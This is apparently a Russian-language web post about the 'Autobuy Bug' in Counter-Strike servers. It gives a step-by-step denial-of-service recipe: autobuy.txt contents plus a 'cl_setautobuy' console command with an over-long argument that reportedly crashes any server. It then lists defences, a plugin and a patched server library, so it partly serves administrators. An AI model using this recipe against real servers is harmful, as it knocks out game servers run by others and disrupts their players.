Краши серверов сейчас, к сожалению, стали очень популярными.
Злоумышленники узнают/разрабатывают все новые и новые баги/уязвимости
серверов, порою в целях мести админу или просто раскручивая свой сервер
(продвигая его в топах и расчищая ему дорогу). Autobuy Bug - Это простой баг.
[Действие бага] 1) В файле autobuy.txt (лежит в папке cstrike вашей CS) пропишите следующее: m4a1
ak47
famas
galil
p90
mp5
primammo
secammoalias "primammo" "buyammo1;buyammo1;buyammo1;buyammo1;buyammo1;buyammo1;buyammo1"
alias "secoammo" "buyammo2;buyammo2;buyammo2;buyammo2;buyammo2;buyammo2;buyammo2"
alias "+awpsniper" "awp;usp;vesthelm;flash;flash;hegren;defuser"
alias "-awpsniper" "slot10;secoammo;primammo"
then
bind "f5" "+awpsniper"
defuser
vesthelm
vest 2) Зайдите на ЛЮБОЙ сервер, зайдите за команду и когда будете в игре напишите в консоли: cl_setautobuy fuck 12345678901234567890123456789012 и всё - сервак падает. Проще
говоря уязвимость в том, что autobuy не должен быть больше 32 символов
или равен этому. Иначе войдя в игру с изменённым файлом, игрок может
вызвать DoS атаку и "положить" сервер.
[Методы защиты] 1) Существует плагин, который закрывает полностью данную уязвимость. ссылка 2) Существуют
пропатченные библиотека/сошка под ваш сервер WIN/LIN, которые просто
нужно заменить на своем сервере (папка cstrike/dlls). Плагин не нужен. скачать патч [1.5 mb]
|